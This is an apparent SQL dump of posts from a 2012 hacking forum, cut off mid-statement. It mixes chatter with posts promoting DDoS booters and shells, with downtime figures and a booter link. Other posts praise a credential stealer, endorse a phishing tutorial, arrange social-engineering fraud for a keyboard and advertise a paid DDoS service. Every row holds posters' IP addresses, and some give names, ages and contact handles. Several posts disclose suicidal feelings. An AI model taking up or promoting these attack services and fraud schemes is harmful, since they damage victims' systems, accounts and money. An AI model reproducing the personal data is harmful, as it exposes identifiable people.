`icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3078', '626', '3020', '19', 'RE: ?? Best Free Private DoS Shells ?? 57 Private Free Shells', '0', '100', '??zg???g????61', '1349054423', 'Hey hey hey ;D hit me up with these? ;D Thanks', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '2765e489aa7a3cf484a3ae36cab4bde3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3074', '589', '2861', '15', 'RE: Crime24 Stealer', '0', '199', 'Anonymous™', '1349053365', 'Thank you for sharing this with us NeonLights.', '85.230.50.38', '1441149478', '1', '0', '0', '0', '1', '620b3d77b34c7c94cda6500d3642fcec', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3075', '634', '0', '7', 'Depressed', '5', '203', 'NeonLights', '1349053684', 'i fucking hate my life some days i feel like commiting suicide why did u have to leave me mom :( u meant so much to me. without you life has been difficult and i feel like theres no more meaning for me to be here... if only i saw u one more time... my life would change completely 09/28/2012 a day that i will never forget :\'(', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', '1ca2369a19660905338717088a44244b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3076', '634', '3075', '7', 'RE: Depressed', '0', '1', 't3h jok3r', '1349053845', 'I feel sorry for you man. You have to move on with life.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '10817c0fb318c18463ac83b4bd85a732', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3077', '634', '3076', '7', 'RE: Depressed', '0', '203', 'NeonLights', '1349053961', '[quote=\'t3h jok3r\' pid=\'3076\' dateline=\'1349053845\'] I feel sorry for you man. You have to move on with life. [/quote] i know but its hard :( it makes it harder at school :( i keep having images from at the hospital when she was lying there :( i just cant stop thinking about it, its messing me up :\'( :\'( :\'(', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', '92b2e48575fceb8f72212c7bfd953fc0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3079', '634', '3075', '7', 'RE: Depressed', '0', '82', 'iTzIpod', '1349055369', 'Dude. To be honest, I\'m really depressed too. I was having suicidal thoughts from yesterday. I even had a dream I killed myself last night. I\'m having relationship problems with my ex.. And I gotta learn the hard way.. Which was to move and and forget.. I feel you dude. Stay in there. Stay strong. :/ Same goes for me aswell.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '079c0a33a20cbb8f690fb7b988a6bc30', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3080', '634', '3079', '7', 'RE: Depressed', '0', '203', 'NeonLights', '1349055427', '[quote=\'iTzIpod\' pid=\'3079\' dateline=\'1349055369\'] Dude. To be honest, I\'m really depressed too. I was having suicidal thoughts from yesterday. I even had a dream I killed myself last night. I\'m having relationship problems with my ex.. And I gotta learn the hard way.. Which was to move and and forget.. I feel you dude. Stay in there. Stay strong. :/ Same goes for me aswell. [/quote] im sorry to hear of that :( & thx', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', 'fffac6c143d24d6d0bc7f9d29d3f34a2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3081', '626', '3020', '19', 'RE: ?? Best Free Private DoS Shells ?? 57 Private Free Shells', '0', '82', 'iTzIpod', '1349059607', 'iTzGRONgamer61 just try using another online booter. :p Or download one? Jay\'s booter? Etc :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f60307103b0df9e89ae9eebe651b4af4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3082', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1349060570', 'http://www.listenonrepeat.com/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b1a3a23bc657da1d85b5f4876ffdc887', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3083', '589', '2861', '15', 'RE: Crime24 Stealer', '0', '82', 'iTzIpod', '1349060600', 'Thanks for the share dude.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1d0edfb1dc9de32b5a9dd4cc9d516089', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3084', '634', '3075', '7', 'RE: Depressed', '0', '82', 'iTzIpod', '1349060695', 'No problem. Just trying to help out another bro. Good luck.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '39b27cea41aadda086d4cf1772e5e773', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3085', '635', '0', '7', '[Milestone] L33tHacking Forum Total 3,000 Posts', '0', '82', 'iTzIpod', '1349061044', 'Woah Good job guys. We reached 3,000 posts. I\'m impressed! :D I would like to thank everyone. And I mean EVERYONE. Who posted. Each post of yours, contributed to LH. Thanks. Enjoy your day. (I\'m still depressed..) - iTzIpod', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e5c050fcb90dd9464ffb0746abb05de7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3086', '622', '3013', '42', 'RE: Founder of the Pirate Bay Gottfrid Svartholm Arrested in Cambodia', '0', '3', '??????????¢™', '1349062715', 'Could you provide where you found this article?', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', '9bad92805e1c63c6db0d68567245d998', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3087', '635', '3085', '7', 'RE: [Milestone] L33tHacking Forum Total 3,000 Posts', '0', '3', '??????????¢™', '1349062781', 'I am glad we hit 3,000 posts. Hopefully we could hit more posts and get more members.', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', '2d2aee85b193800f60587e5906ca1579', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3088', '634', '3075', '7', 'RE: Depressed', '0', '2', 'Apathy', '1349066677', 'I feel your pain I lost someone very close to me recently. :/', '173.206.129.154', '-1378975334', '0', '0', '0', '0', '1', 'bb462652c8dc10876bfda0f5748dc006', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3089', '574', '2818', '61', 'RE: Clean Thread Design', '0', '2', 'Apathy', '1349066737', 'Very nice share. Thank you. :)', '173.206.129.154', '-1378975334', '0', '0', '0', '0', '1', '68087c6ffd02293fb209bdcf6cee0a3e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3090', '625', '3019', '61', 'RE: Runescape Phishing Tutorial', '0', '2', 'Apathy', '1349066976', 'Awesome share thanks. I will probably give this a go.', '173.206.129.154', '-1378975334', '0', '0', '0', '0', '1', '54022da57581eea8da197cda58e1f650', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3091', '636', '0', '15', 'Free Host Booter', '0', '207', 'Combat', '1349069555', 'http://inteltwo.com/misc.php?page=booter75611.php It is free and web-based with no login, and has IP recoginition. This was originally released in the beta form by RabidGhost to IntelTwo for testing. But the DB was ripped and released to the public. Many people may find out about this so attacks may be limited. [u]Non-Upgraded Users[/u] 10 Seconds of Lag, 80 bot shells = 1-2 minute downtime [u]Upgraded Users[/u] 500 Seconds of Lag, 300 bot shells = 30 minutes downtime', '76.28.177.62', '1276948798', '0', '0', '0', '0', '1', 'c571adc823c8fd123f578e6ad3978fc6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3092', '634', '3075', '7', 'RE: Depressed', '0', '62', 'R?????zo?', '1349073524', 'sucks to hear that bro :( im sorry for you, I don\'t know that pain you feeling though but I wish I could help in some way though :/', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'cc2df5f7f7670bfc0153c29fff44cb12', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3093', '635', '3085', '7', 'RE: [Milestone] L33tHacking Forum Total 3,000 Posts', '0', '199', 'Anonymous™', '1349085229', 'It really shows that the community is growing.', '85.230.50.38', '1441149478', '1', '0', '0', '0', '1', '9205ae1513e8f3496b941f0fe7a0d024', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3094', '190', '665', '56', 'RE: Copy and paste game', '0', '199', 'Anonymous™', '1349085331', 'http://www.tubeplus.me/player/516421/Ted/', '85.230.50.38', '1441149478', '1', '0', '0', '0', '1', '1258088f0b95f3e575cb6c2a08bde980', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3095', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1349089955', 'http://l33thacking.net/thread-574.html', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9827a1f35985d7b00f8d3b3142890c32', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3096', '574', '2818', '61', 'RE: Clean Thread Design', '0', '82', 'iTzIpod', '1349090000', 'No problem! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7dfaeab9384a175e353a2f91b06060cf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3097', '625', '3019', '61', 'RE: Runescape Phishing Tutorial', '0', '82', 'iTzIpod', '1349090043', 'Good luck! And no problem.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '769615be89832393828a5b517e672403', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3098', '637', '0', '16', 'I need to SE a gaming keyboard', '0', '62', 'R?????zo?', '1349092111', 'my current keyboard is old and almost broken, I need a good one but they are expensive for my pocket, I heard logitech is easy but I\'ve never SE\'ed anything in my life. what\'s your thoughts on this? I might be able to pay 40-50% of the price if someone could do this for me, if it\'s a REALLY good keyboard. NOTE: I will only pay once I got the item.', '94.132.244.168', '1585771688', '1', '0', '62', '1349092150', '1', '0680196e8cff8dfeccbabedc24fafbe2', '0', '1349092150'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3100', '637', '3098', '16', 'RE: I need to SE a gaming keyboard', '0', '82', 'iTzIpod', '1349092457', 'I know a friend that can do it for $10 :p Or I can do it free.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b560197a4905c5d98c614033dde826ec', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3102', '638', '0', '61', '100k+ Proxy List', '0', '82', 'iTzIpod', '1349092741', 'Hey L33tHacking! iTzIpod here giving away a special .txt file (Notepad) and it contains 100k+ (100,000+) Proxies! :D To view: http://adf.ly/DKotr To download: http://adf.ly/DKp5L', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '391d91ef7a995abf1ea72e7a084f5d3a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3103', '637', '3098', '16', 'RE: I need to SE a gaming keyboard', '0', '62', 'R?????zo?', '1349096159', 'that would be awesome, can your friend SE any keyboard? I wouldn\'t mind paying $10 if it\'s worth it. and for free what can you SE?', '46.50.95.167', '775053223', '1', '0', '0', '0', '1', 'a80312b6c4210e9ebd1727c3a3752517', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3104', '431', '3000', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '62', 'R?????zo?', '1349098046', '[quote=\'iTzGRONgamer61\' pid=\'3000\' dateline=\'1349029835\'] Heyo, could I have a sig made for myself? Could i have \"GRONgamer61\'s DDoS\'ing Service $4/Hour\", in black and red letters. I\'d like the font to look retro and shiny ;D [/quote] not sure if you wanted something like this [img]http://i.imgur.com/b6ooB.gif[/img] I know you wanted red but it didn\'t look too good.', '31.22.163.234', '521577450', '1', '0', '62', '1349098511', '1', 'd82499164d38ca9b92a3a8bfab3b1208', '0', '1349098511'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3105', '609', '2944', '58', 'RE: Gamers Recruitment', '0', '61', 'NXK', '1349099601', 'I Guess no one wants to join lol :( I\'m pretty much going to accept any application if you game.', '38.104.158.106', '644390506', '1', '0', '0', '0', '1', '752a390c80f8eac7cf676fbe2fea892e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3106', '609', '2944', '58', 'RE: Gamers Recruitment', '0', '62', 'R?????zo?', '1349100022', 'Username: reloadz0r Name: Antonio Age: 20 Profile: http://l33thacking.net/user-62.html Why I should join Gamers: I been into gaming for a quite few years now, mostly FPS. I\'ve played since CoD1 up to CoD:MW2, played at competion/LAN level, I\'ve won few LAN party\'s with my old clan, recently I decided to quit FPS and moved on to MMO\'s. I play abit of CS:GO still :) What I can contribute in the group: I can provide tips and tricks from an experienced player,help the others solving problems, bugs. Also can do some GFX work if needed.', '31.22.163.234', '521577450', '1', '0', '0', '0', '1', 'd33593d50964e9ac4f167ff3e333e140', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3107', '639', '0', '66', '[News] Updates,Releases,Edits', '0', '61', 'NXK', '1349100608', 'I will be starting to add content tonight. If anyone else would like to contribute when I get more members in the group that would be nice. Id love to see some gaming tutorials.', '38.104.158.106', '644390506', '1', '0', '0', '0', '1', 'b7f44867bf98be552c2396a069cc68a5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3108', '589', '2861', '15', 'RE: Crime24 Stealer', '0', '61', 'NXK', '1349100667', 'I\'ve had a panel for this stealer set up for awhile, It\'s nice. Glad to see other members know about it.', '38.104.158.106', '644390506', '1', '0', '0', '0', '1', 'b243f51ac53d725892111abb76c8132a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3109', '640', '0', '21', 'sad', '0', '100', '??zg???g????61', '1349104320', 'asdadfsdFsdfasdfsdfdsjafffffffffffffffffffffffffffffffffffffffffffffffff', '46.249.57.80', '788085072', '1', '0', '0', '0', '-2', '9dade78a5371512e93ab4f0e6eaaa0b2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3110', '190', '665', '56', 'RE: Copy and paste game', '0', '199', 'Anonymous™', '1349104942', '=ur:WindowsLiveID&wctx=wa%3Dwsignin1.0%26rpsnv%3D11%26ct%3D1349104863%26rver%3D6.1.6206.0%26wp%3DMBI%26wreply%3Dhttp:%252F%252Fmail.com%252Fdefault.aspx%26lc%3D1053%26id%3D64855%26mkt%3Dsv-se%26cbcxt%3Dmai%26snsc%3D1%26bk%3D1349104863\',t:\'Hotmail\',u:\'\',v:\'\',aa:\'https://graphics.hotmail.com/mail/w3/ltr/loginimages/m3_login_sv.jpg\',ab:\'https://secure.shared.live.com/~Live.SiteContent.Explore/~15.40.70/header/mai/SV-SE/header.html?id=64855&mkt=SV-SE&cbcxt=mai\',w:false,ac:\'\',urlPost:\'https://login.live.com/ppsecure/post.srf?wa=wsignin1.0&rpsnv=11&ct=1349104863&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&lc=1053&id=64855&mkt=sv-se&cbcxt=mai&snsc=1&bk=1349104863\',C:\'\',html:[],ad:\'http://login.live.com/gls.srf?urlID=WLHelpCentral&mkt=SV-SE&vv=1350\',D:null,ae:\'\',Aa:\"&copy;2012 Microsoft\",str:[],z:\'\',F:{},af:\'http://go.microsoft.com/fwlink/?LinkID=254486\',Ab:\'\',sErrTxt:\'\',ag:\'https://login.live.com/ppsecure/secure.srf?wa=wsignin1.0&rpsnv=11&ct=1349104863&rver=6.1.6206.0&wp=MBI&wrep', '85.230.50.38', '1441149478', '1', '0', '199', '1349105016', '1', '37d1da8fcae2c1d6d795834b2f0acb32', '0', '1349105016'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3111', '613', '2977', '66', 'RE: Some Changes that will be made', '0', '62', 'R?????zo?', '1349105223', 'I mean I can try again for you if you are more specific, for free.. I will animate it.', '31.22.163.234', '521577450', '1', '0', '0', '0', '1', '78b4c49c4b354cbe8d0cd34ec9518ac9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3112', '608', '2943', '66', 'RE: Welcome To Gamers!', '0', '62', 'R?????zo?', '1349105343', 'GamerTag - N/A PSN - durooo (i dont play much) Steam - r3loadz0r Skype - josejose6099', '31.22.163.234', '521577450', '1', '0', '0', '0', '1', '5520caf2934cd5ac6cff185277290bb9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3113', '641', '0', '42', 'File-Sharing for Personal Use Declared Legal in Portugal', '0', '62', 'R?????zo?', '1349106003', 'Hoping to curb the ever-increasing piracy figures in Portugal, local anti-piracy outfit ACAPOR reported the IP-addresses of 2,000 alleged file-sharers to the Attorney General last year. This week the Portuguese prosecutor came back with a ruling and decided not to go after the individuals connected to the IP-addresses. According to the prosecutor it is not against the law to share copyrighted works for personal use, and an IP-address is not enough evidence to identify a person. Wearing T-shirts with the slogan “Piracy is Illegal”, the movie industry sponsored anti-piracy group ACAPOR delivered several boxes full of IP-addresses of alleged ‘illegal’ file-sharers to the Attorney General’s Office last year. The “evidence” was handed over in two batches and the group demanded the authorities act against 2,000 alleged pirates. “We are doing anything we can to alert the government to the very serious situation in the entertainment industry,” ACAPOR commented at the time, adding that “1000 complaints a month should be enough to embarrass the judiciary system.” However, a year later it turns out that ACAPOR’s actions have backfired and the anti-piracy group is now facing the embarrassment. ACAPOR delivering the complaints The Department of Investigation and Penal Action (DIAP) looked into the complaints and the prosecutor came back with his order this week. Contrary to what the anti-piracy group had hoped for, the 2,000 IP-addresses will not be taken to court. Worse for ACAPOR, the prosecutor goes even further by ruling that file-sharing for personal use is not against the law. “From a legal point of view, while taking into account that users are both uploaders and downloaders in these file-sharing networks, we see this conduct as lawful, even when it’s considered that the users continue to share once the download is finished.” The prosecutor adds that the right to education, culture, and freedom of expression on the Internet should not be restricted in cases where the copyright infringements are clearly non-commercial. In addition, the order notes that an IP-address is not a person. The ruling explains that the person connected to the IP-address “is not necessarily the user at the moment the infringement takes place, or the user that makes available the copyrighted work, but rather the individual who has the service registered in his name, independent of whether this person using it or not” This means that the account holders connected to these 2,000 IPs are not necessarily all copyright infringers, similar to orders we’ve seen in the United States previously. Finally, the prosecutor ruled that even if file-sharing for personal use would be seen as illegal, the artists themselves should explicitly declare that there are not authorizing copying for personal use. ACAPOR boss Nuno Pereira is disappointed with the decision and he accuses the prosecutor of dropping the case because it’s the easy way out. “Personally I think the prosecutors just found a way to adapt the law to their interest – and their interest is not having to send 2,000 letters, hear 2,000 people and investigate 2,000 computers,” Pereira says. Another way to frame it is that the prosecutor adapted the law in the interest of the public at large, which is generally speaking not a bad idea. While the decision is hopeful for Portuguese file-sharers, it is still a matter of how the law is interpreted. For now, however, it is save to assume that Portugal is spared from the mass-BitTorrent lawsuits we’ve seen in the United States, Germany and the UK. source: http://torrentfreak.com/file-sharing-for-personal-use-declared-legal-in-portugal-120927/', '31.22.163.234', '521577450', '1', '0', '62', '1349198901', '1', 'e57268ae33d55f7a354d61713888f688', '0', '1349198901'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3195', '641', '3163', '42', 'RE: File-Sharing for Personal Use Declared Legal in Portugal', '0', '62', 'R?????zo?', '1349198919', '[quote=\'Timmy\' pid=\'3163\' dateline=\'1349143265\'] The introduction has been copied and pasted twice. [/quote] fixed it for you.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'c58cafe024902e1d5269abaa8c9320d9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3196', '649', '3179', '3', 'RE: Thanks to the following and L33THacking Monthly Stats', '0', '82', 'iTzIpod', '1349205495', 'Just saying that to people outside of Unique. And I know that already. Also noticed that Super Mods can do that too. I noticed Reborn posting in Unique. So.. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e4be9c4950b636c6a9745c707ef859be', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3197', '253', '1106', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1349205524', '27 is the next number .', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0caafe231a40a87341bdf1db384a6494', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3198', '488', '2355', '8', 'RE: What are you listening to?', '0', '82', 'iTzIpod', '1349205578', 'Listening to Owl City - Good Time', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bb6ca159f94bc1a4dead2b9dc6d295d2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3199', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1349205778', 'http://www.mediafire.com/?6xr4zha21my3agy HQ Thread Design :p', '24.212.197.164', '416597412', 